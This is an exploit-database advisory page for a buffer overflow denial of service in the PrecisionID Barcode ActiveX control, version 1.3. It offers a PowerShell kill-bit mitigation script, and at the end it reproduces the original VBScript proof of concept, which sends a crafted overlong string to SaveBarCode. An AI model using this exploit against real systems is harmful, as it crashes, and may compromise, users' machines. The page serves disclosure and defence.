vendor: Barcode ActiveX
by: shinnai
CVSS: 7.5 (HIGH)
Denial of Service
CWE
Product Name: Barcode ActiveX
Affected Version From: Not available
Affected Version To: Not available
Patch Exists: NO
Related CWE: Not available
CPE: Not available
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7
2007

PrecisionID Barcode ActiveX (PrecisionID_DataMatrix.DLL) 1.3 Denial of Service

This exploit targets the PrecisionID Barcode ActiveX control, specifically PrecisionID_DataMatrix.DLL version 1.3. The proof of concept is written in VBScript: it passes an overlong, specially crafted string to the control's SaveBarCode method, which triggers a buffer overflow and causes a denial of service condition in the affected software.

Mitigation:

The vendor does not provide a specific mitigation or remediation for this vulnerability. However, users are advised to update to the latest version of the software and follow best practices for secure ActiveX control usage.
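
One concrete hardening step while no patch exists, given here as an added example (it is not part of the original advisory or any vendor guidance): set the Internet Explorer kill bit for the CLSID that appears in the proof of concept's object tag, so that IE refuses to instantiate the control. The function name Set-ActiveXKillBit is hypothetical; the registry path and the 0x400 Compatibility Flags value are the standard Windows kill-bit mechanism.

```powershell
#Requires -RunAsAdministrator
# Added example, not code from the advisory: block the control in Internet Explorer.

# CLSID taken from the <object classid=...> tag in the proof of concept on this page.
$Clsid     = '{6C951D10-B07F-11DB-A6ED-0050C2490048}'
$KillBit   = 0x00000400            # Compatibility Flags bit that stops IE instantiating the control
$ValueName = 'Compatibility Flags'

# 64-bit Windows keeps a second list for 32-bit Internet Explorer under WOW6432Node.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Set-ActiveXKillBit {       # hypothetical helper name
    param(
        [Parameter(Mandatory)] [string] $Root,
        [Parameter(Mandatory)] [string] $Clsid
    )

    # Skip registry views that do not exist on this machine (e.g. 32-bit OS).
    if (-not (Test-Path -LiteralPath $Root)) { return }

    $key = Join-Path $Root $Clsid
    if (-not (Test-Path -LiteralPath $key)) {
        New-Item -Path $key -Force | Out-Null
    }

    # Keep any flags that are already set and OR the kill bit into them.
    $current = (Get-ItemProperty -LiteralPath $key -Name $ValueName `
                    -ErrorAction SilentlyContinue).$ValueName
    if ($null -eq $current) { $current = 0 }
    $new = $current -bor $KillBit

    New-ItemProperty -LiteralPath $key -Name $ValueName -PropertyType DWord `
        -Value $new -Force | Out-Null

    # Report what changed so the result can be recorded or audited.
    [pscustomobject]@{
        Key    = $key
        Before = '0x{0:X8}' -f $current
        After  = '0x{0:X8}' -f $new
    }
}

$Roots | ForEach-Object { Set-ActiveXKillBit -Root $_ -Clsid $Clsid } |
    Format-Table -AutoSize
```

The kill bit only stops Internet Explorer and other hosts that honor it from loading the control; applications that load the DLL directly are not covered by it.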

Exploit-DB raw data:

<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/12</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">--------------------------------------------------------------------------------
 <b>PrecisionID Barcode ActiveX (PrecisionID_DataMatrix.DLL) 1.3 Denial of Service</b>
 url: http://www.precisionid.com/

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 All software that uses this ocx is vulnerable to these exploits.
--------------------------------------------------------------------------------

<object classid='clsid:6C951D10-B07F-11DB-A6ED-0050C2490048' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
 Sub tryMe
  buff=String(304,"B")
     
  get_eax = unescape("%D1%60%61%61")

  buff2 = String(709,"C")

  egg = buff + get_eax + buff2
  
  test.SaveBarCode egg
 End Sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-05-12]